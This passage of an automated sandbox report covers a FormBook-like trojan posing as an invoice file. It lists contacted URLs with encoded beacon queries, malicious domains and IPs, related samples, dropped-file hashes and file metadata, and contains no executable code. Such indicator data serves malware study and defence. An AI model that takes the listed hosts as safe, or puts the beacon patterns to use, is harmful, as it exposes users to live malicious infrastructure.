                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.dlion.net/zdtk/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.06753.photo/4i55/?Pt=fDlHoNWP0RBd&UTJ0bhC=u0M432eX/xZzvajH7Zn4oj16d1M/QQvp1keQ4HSaLqVhf5mFg72lw0bKX+EdY5KNk4RXhc2Czo9qgjxQ7/1U7lrsyz5+vZkdL+U3wCm0CZUZdVO/eyd7jrB+924QONEljg==true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.binacamasala.com/gnm5/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.premium303max.rest/p39a/?Pt=fDlHoNWP0RBd&UTJ0bhC=NYM041vNjejJmgmdhSmYVhxa0+fvP9BrXtGCCHxlIJ8IspgLPDvRAlXhNJfLJHdGPUuKZVGM9QJ5KO5zmQZa2t3P5lFBsDeA2Uq7kE2QIl2fKsXQslF4XsSGUXNQZJSmUg==true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.73613.shop/tizt/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.73613.shop/tizt/?UTJ0bhC=qmi+mqOOYFdY+IQEwG2FxqFWHTg0Nvqmcf68l9cfSo4s6etqUFq9dTq1GSeGSZSg4PJsoSCL3HUy+ahRuGvxg8Ma1a6j66cDsm0o40uJcJz1cVDMGreiQH32Lp7znSrnRg==&Pt=fDlHoNWP0RBdtrue
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.06753.photo/4i55/true
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.bioart.buzz/uwg4/?UTJ0bhC=FrIvBq+7M+fO4hFqHVkj/h0MgBQBdbkSyhygt3ownjEqtb7lfSc+JwlWQ4K/WGS3VMA0fSxFYiNdEScU0GRMxZDLyu9hbg86BnUYxIHc13WjzD0wj4NYGBX3EB3iY/brcg==&Pt=fDlHoNWP0RBdtrue
                                                      • Avira URL Cloud: malware
                                                      unknown
                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://www.hover.com/domain_pricing?source=parkedfQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.hover.com/privacy?source=parkedfQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://duckduckgo.com/chrome_newtabxwizard.exe, 00000005.00000002.4505305897.000000000815E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://twitter.com/hoverfQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                          high
                                                          https://duckduckgo.com/ac/?q=xwizard.exe, 00000005.00000002.4505305897.000000000815E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://www.instagram.com/hover_domainsfQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                              high
                                                              https://www.hover.com/transfer_in?source=parkedfQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://www.hover.com/renew?source=parkedfQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=xwizard.exe, 00000005.00000002.4505305897.000000000815E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://error.kangleweb.net/?code=404&vh=594445fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004F42000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.00000000063D2000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=xwizard.exe, 00000005.00000002.4505305897.000000000815E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://www.ecosia.org/newtab/xwizard.exe, 00000005.00000002.4505305897.000000000815E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.hover.com/email?source=parkedfQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.hover.com/about?source=parkedfQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://ac.ecosia.org/autocomplete?q=xwizard.exe, 00000005.00000002.4505305897.000000000815E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://www.hover.com/domains/resultsfQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.hover.com/tos?source=parkedfQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://premium303max.rest/p39a/?Pt=fDlHoNWP0RBd&UTJ0bhC=NYM041vNjejJmgmdhSmYVhxa0fQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.00000000053F8000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000006888000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchxwizard.exe, 00000005.00000002.4505305897.000000000815E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=xwizard.exe, 00000005.00000002.4505305897.000000000815E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.hover.com/tools?source=parkedfQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://help.hover.com/home?source=parkedfQbMdgFgKkVEm.exe, 00000004.00000002.4506238752.0000000004A8C000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 00000005.00000002.4505142286.0000000007E30000.00000004.00000800.00020000.00000000.sdmp, xwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://www.locuramagica.onlinefQbMdgFgKkVEm.exe, 00000004.00000002.4507703675.0000000006522000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.hover.com/?source=parkedxwizard.exe, 00000005.00000002.4503542218.0000000005F1C000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs
                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            217.160.0.132
                                                                            www.astrext.infoGermany
                                                                            8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                            31.31.198.145
                                                                            www.locuramagica.onlineRussian Federation
                                                                            197695AS-REGRUtrue
                                                                            45.79.252.94
                                                                            www.premium303max.restUnited States
                                                                            63949LINODE-APLinodeLLCUStrue
                                                                            203.161.49.193
                                                                            www.eco-tops.websiteMalaysia
                                                                            45899VNPT-AS-VNVNPTCorpVNtrue
                                                                            23.167.152.41
                                                                            gtml.huksa.huhusddfnsuegcdn.comReserved
                                                                            395774ESVC-ASNUSfalse
                                                                            178.79.184.196
                                                                            gucciqueen.shopUnited Kingdom
                                                                            63949LINODE-APLinodeLLCUStrue
                                                                            180.178.39.236
                                                                            www.73613.shopHong Kong
                                                                            45753NETSEC-HKNETSECHKtrue
                                                                            74.48.34.43
                                                                            cn-hk2.rvh2.raincs.cnCanada
                                                                            14663TELUS-3CAtrue
                                                                            3.33.130.190
                                                                            binacamasala.comUnited States
                                                                            8987AMAZONEXPANSIONGBtrue
                                                                            216.40.34.41
                                                                            www.newhopetoday.appCanada
                                                                            15348TUCOWSCAtrue
                                                                            46.38.243.234
                                                                            dlion.netGermany
                                                                            197540NETCUP-ASnetcupGmbHDEtrue
                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1572490
                                                                            Start date and time:2024-12-10 16:22:06 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 10m 42s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:7
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:1
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:Outstanding Invoices Spreadsheet Scan 00495_PDF.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@7/3@17/11
                                                                            EGA Information:
                                                                            • Successful, ratio: 100%
                                                                            HCA Information:
                                                                            • Successful, ratio: 91%
                                                                            • Number of executed functions: 41
                                                                            • Number of non-executed functions: 310
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe
                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                            • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            • VT rate limit hit for: Outstanding Invoices Spreadsheet Scan 00495_PDF.exe
                                                                            TimeTypeDescription
                                                                            10:24:06API Interceptor9951939x Sleep call for process: xwizard.exe modified
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            217.160.0.132Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                            • www.astrext.info/8u3q/
                                                                            LlbpXphTu9.exeGet hashmaliciousUnknownBrowse
                                                                            • www.astrext.info/igvi/
                                                                            08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exeGet hashmaliciousFormBookBrowse
                                                                            • www.marketplaceimmo.com/q36s/?1bGpqN=3pP/L2XpSC30J9vFVSLRbULXiIxRhzb0AzWKRXEle5xB/rg0XzMhonS5eIq4WPaEzNk7&Vr=MBZl9ZMXj4u
                                                                            31.31.198.145HXpVpoC9cr.exeGet hashmaliciousFormBookBrowse
                                                                            • www.locuramagica.online/0j80/
                                                                            NIlfETZ9aE.exeGet hashmaliciousFormBookBrowse
                                                                            • www.locuramagica.online/o1gh/
                                                                            WARUNKI UMOWY-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                            • www.locuramagica.online/huqh/
                                                                            45.79.252.94Maryam Farokhi-PhD- CV-1403.exeGet hashmaliciousFormBookBrowse
                                                                            • www.premium303max.rest/s6a5/
                                                                            Y7isAhMKal.exeGet hashmaliciousFormBookBrowse
                                                                            • www.premium303max.rest/0nni/
                                                                            DHL_doc.exeGet hashmaliciousFormBookBrowse
                                                                            • www.premium303max.rest/4sq5/
                                                                            INVOICES.exeGet hashmaliciousFormBookBrowse
                                                                            • www.premium303max.rest/4sq5/
                                                                            203.161.49.193ORIGINAL INVOICE COAU7230734290.exeGet hashmaliciousFormBookBrowse
                                                                            • www.futurevision.life/hxmz/
                                                                            Payroll List.exeGet hashmaliciousFormBookBrowse
                                                                            • www.futurevision.life/hxmz/
                                                                            MV KODCO.exeGet hashmaliciousFormBookBrowse
                                                                            • www.futurevision.life/hxmz/?jD=VzTtTZ&1H=xeYt+TVrluKccowmz5a5GltLZ9YZ3snijwrYeJgffsaeXHWEwE1YZCbtIyEm+ckVl2hmk1+GOFDMCTsPe0H70c0RaNOmwh+TnBkmQn+jSxAt6pokQYbXkws=
                                                                            PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                            • www.inspires.website/tv3i/
                                                                            Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                            • www.futurevision.life/hxmz/
                                                                            PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                            • www.futurevision.life/hxmz/
                                                                            Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousFormBookBrowse
                                                                            • www.futurevision.life/cadc/?mRu=yfxAwDfWka0dfjkEErxT6WYgWaOc4HN689PIo8avXNW9JAsEk9V7nvZjppH3ozqb+GZGdofwBlLzR01W2aLtY3/CfTpxh0qnHwCWqwdq33lIMBmS8NPwCm4=&UJ=7H1XM
                                                                            Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                            • www.eco-tops.website/n54u/
                                                                            Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                            • www.futurevision.life/hxmz/
                                                                            DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                                            • www.harmonid.life/aq3t/
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            www.73613.shopLetter of Intent (LOI) For the Company November 2024 PDF.pif.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                            • 180.178.39.235
                                                                            19387759999PO-RFQ-INVOICE-doc.exeGet hashmaliciousFormBookBrowse
                                                                            • 180.178.39.237
                                                                            www.premium303max.restMaryam Farokhi-PhD- CV-1403.exeGet hashmaliciousFormBookBrowse
                                                                            • 45.79.252.94
                                                                            Y7isAhMKal.exeGet hashmaliciousFormBookBrowse
                                                                            • 45.79.252.94
                                                                            DHL_doc.exeGet hashmaliciousFormBookBrowse
                                                                            • 45.79.252.94
                                                                            INVOICES.exeGet hashmaliciousFormBookBrowse
                                                                            • 45.79.252.94
                                                                            www.newhopetoday.appLetter of Intent (LOI) For the Company November 2024 PDF.pif.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                            • 216.40.34.41
                                                                            A4mmSHCUi2.exeGet hashmaliciousFormBookBrowse
                                                                            • 216.40.34.41
                                                                            LlbpXphTu9.exeGet hashmaliciousUnknownBrowse
                                                                            • 216.40.34.41
                                                                            zamowienie.exeGet hashmaliciousGuLoaderBrowse
                                                                            • 216.40.34.41
                                                                            10145202485.vbsGet hashmaliciousGuLoaderBrowse
                                                                            • 216.40.34.41
                                                                            www.locuramagica.onlineHXpVpoC9cr.exeGet hashmaliciousFormBookBrowse
                                                                            • 31.31.198.145
                                                                            NIlfETZ9aE.exeGet hashmaliciousFormBookBrowse
                                                                            • 31.31.198.145
                                                                            WARUNKI UMOWY-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                            • 31.31.198.145
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            ONEANDONE-ASBrauerstrasse48DEPO2412010.exeGet hashmaliciousFormBookBrowse
                                                                            • 77.68.64.45
                                                                            tmpCA68.HtM.htmGet hashmaliciousUnknownBrowse
                                                                            • 82.223.161.12
                                                                            la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                                                                            • 62.151.165.56
                                                                            la.bot.sh4.elfGet hashmaliciousMiraiBrowse
                                                                            • 82.223.135.21
                                                                            la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                                            • 74.208.219.57
                                                                            https://uhu145fc.s3.amazonaws.com/bf63.html?B3E2629E-DF5B-2F28-7322FD910FB23F54Get hashmaliciousPhisherBrowse
                                                                            • 82.223.68.99
                                                                            ithgreat.docGet hashmaliciousUnknownBrowse
                                                                            • 87.106.68.207
                                                                            DRAFT COPY BL, CI & PL.exeGet hashmaliciousFormBookBrowse
                                                                            • 217.160.0.113
                                                                            NEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                                            • 217.160.0.200
                                                                            atthings.docGet hashmaliciousRemcosBrowse
                                                                            • 87.106.161.219
                                                                            AS-REGRURevo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                                                            • 194.87.189.43
                                                                            Revo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                                                            • 194.87.189.43
                                                                            cXjy5Y6dXX.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                            • 193.124.205.63
                                                                            SRT68.exeGet hashmaliciousFormBookBrowse
                                                                            • 194.58.112.174
                                                                            New Order.exeGet hashmaliciousFormBookBrowse
                                                                            • 31.31.196.17
                                                                            72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                                            • 194.58.112.174
                                                                            attached invoice.exeGet hashmaliciousFormBookBrowse
                                                                            • 31.31.196.17
                                                                            specification and drawing.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                            • 194.58.112.174
                                                                            Pre Alert PO TVKJEANSA00967.bat.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                            • 194.58.112.174
                                                                            DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                            • 37.140.192.206
                                                                            LINODE-APLinodeLLCUSrebirth.spc.elfGet hashmaliciousMirai, OkiruBrowse
                                                                            • 212.71.233.17
                                                                            la.bot.arm6.elfGet hashmaliciousMiraiBrowse
                                                                            • 178.79.182.90
                                                                            la.bot.mipsel.elfGet hashmaliciousMiraiBrowse
                                                                            • 50.116.24.57
                                                                            BlOgLNwCom.exeGet hashmaliciousXenoRATBrowse
                                                                            • 96.126.118.61
                                                                            i586.elfGet hashmaliciousUnknownBrowse
                                                                            • 172.104.31.172
                                                                            AS6xKJzYJT.exeGet hashmaliciousPython Stealer, XenoRATBrowse
                                                                            • 96.126.118.61
                                                                            1OaTX8zI4B.exeGet hashmaliciousXenoRATBrowse
                                                                            • 96.126.118.61
                                                                            yliGAnBiRb.exeGet hashmaliciousUnknownBrowse
                                                                            • 96.126.118.61
                                                                            5Xt3byH0Pj.exeGet hashmaliciousXenoRATBrowse
                                                                            • 96.126.118.61
                                                                            3ToTB8VeHH.exeGet hashmaliciousXenoRATBrowse
                                                                            • 96.126.118.61
                                                                            VNPT-AS-VNVNPTCorpVNrebirth.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                            • 14.255.152.82
                                                                            rebirth.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                            • 14.165.185.26
                                                                            rebirth.arm5.elfGet hashmaliciousMirai, OkiruBrowse
                                                                            • 14.185.213.35
                                                                            rebirth.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                                            • 113.181.189.105
                                                                            la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                                                            • 14.249.82.64
                                                                            la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                                            • 14.254.4.58
                                                                            Fantazy.spc.elfGet hashmaliciousUnknownBrowse
                                                                            • 14.235.164.136
                                                                            Fantazy.x86.elfGet hashmaliciousUnknownBrowse
                                                                            • 222.254.80.159
                                                                            sh4.elfGet hashmaliciousUnknownBrowse
                                                                            • 14.180.80.201
                                                                            Fantazy.m68k.elfGet hashmaliciousUnknownBrowse
                                                                            • 113.184.128.63
                                                                            No context
                                                                            No context
                                                                            Process:C:\Windows\SysWOW64\xwizard.exe
                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                            Category:dropped
                                                                            Size (bytes):196608
                                                                            Entropy (8bit):1.121297215059106
                                                                            Encrypted:false
                                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):288256
                                                                            Entropy (8bit):7.995347160111417
                                                                            Encrypted:true
                                                                            SSDEEP:6144:ANciA7wpXEMdJmYbl+1QBevYXEKThUMUT89bYSEZNJTMvUrkw:ANciA7kEmJm+deveoQbx6NJ4i
                                                                            MD5:B8DE90B7E6BB7FD6B44D85AD9BA18900
                                                                            SHA1:41081986ADD03ADE6CB850D028C1127F7453AC01
                                                                            SHA-256:4FAB464FF7634E54D77D2A91976D9DEA56039AE5190CDC46C6ECD69841BA99E0
                                                                            SHA-512:B2415522B22CACEBEA1B6649287CBA06278FA5C8255C00733130654140AADC6EAF2FE72A095BC39FFF438E855C176BE1F3E1004741B964E078E0F98AF23A4887
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:.....3QT6k..>....p.OY..iB[...T63BI73DI6LOOZRVQAASN3QT63BI73.I6LAP.\V.H.r.2...g* D.4;Y+=.7r50//<:.31.A7'.Z*ir..o7=24oL^D.QT63BI7JE@.q/(.o66.|3).K..x)P.^.s/=.L..o.T.._P*tWT.I6LOOZRV..AS.2PT....73DI6LOO.RTPJ@XN3.P63BI73DI6.[OZRFQAA#J3QTv3BY73DK6LIOZRVQAAUN3QT63BIG7DI4LOOZRVSA..N3AT6#BI73TI6\OOZRVQQASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6La;?*"QAA..7QT&3BIc7DI&LOOZRVQAASN3QT.3B)73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63B
                                                                            Process:C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):288256
                                                                            Entropy (8bit):7.995347160111417
                                                                            Encrypted:true
                                                                            SSDEEP:6144:ANciA7wpXEMdJmYbl+1QBevYXEKThUMUT89bYSEZNJTMvUrkw:ANciA7kEmJm+deveoQbx6NJ4i
                                                                            MD5:B8DE90B7E6BB7FD6B44D85AD9BA18900
                                                                            SHA1:41081986ADD03ADE6CB850D028C1127F7453AC01
                                                                            SHA-256:4FAB464FF7634E54D77D2A91976D9DEA56039AE5190CDC46C6ECD69841BA99E0
                                                                            SHA-512:B2415522B22CACEBEA1B6649287CBA06278FA5C8255C00733130654140AADC6EAF2FE72A095BC39FFF438E855C176BE1F3E1004741B964E078E0F98AF23A4887
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:.....3QT6k..>....p.OY..iB[...T63BI73DI6LOOZRVQAASN3QT63BI73.I6LAP.\V.H.r.2...g* D.4;Y+=.7r50//<:.31.A7'.Z*ir..o7=24oL^D.QT63BI7JE@.q/(.o66.|3).K..x)P.^.s/=.L..o.T.._P*tWT.I6LOOZRV..AS.2PT....73DI6LOO.RTPJ@XN3.P63BI73DI6.[OZRFQAA#J3QTv3BY73DK6LIOZRVQAAUN3QT63BIG7DI4LOOZRVSA..N3AT6#BI73TI6\OOZRVQQASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6La;?*"QAA..7QT&3BIc7DI&LOOZRVQAASN3QT.3B)73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63BI73DI6LOOZRVQAASN3QT63B
                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):7.219222550779852
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 95.11%
                                                                            • AutoIt3 compiled script executable (510682/80) 4.86%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:Outstanding Invoices Spreadsheet Scan 00495_PDF.exe
                                                                            File size:983'498 bytes
                                                                            MD5:809f3ed91d34d38f0eced2a0709e22e9
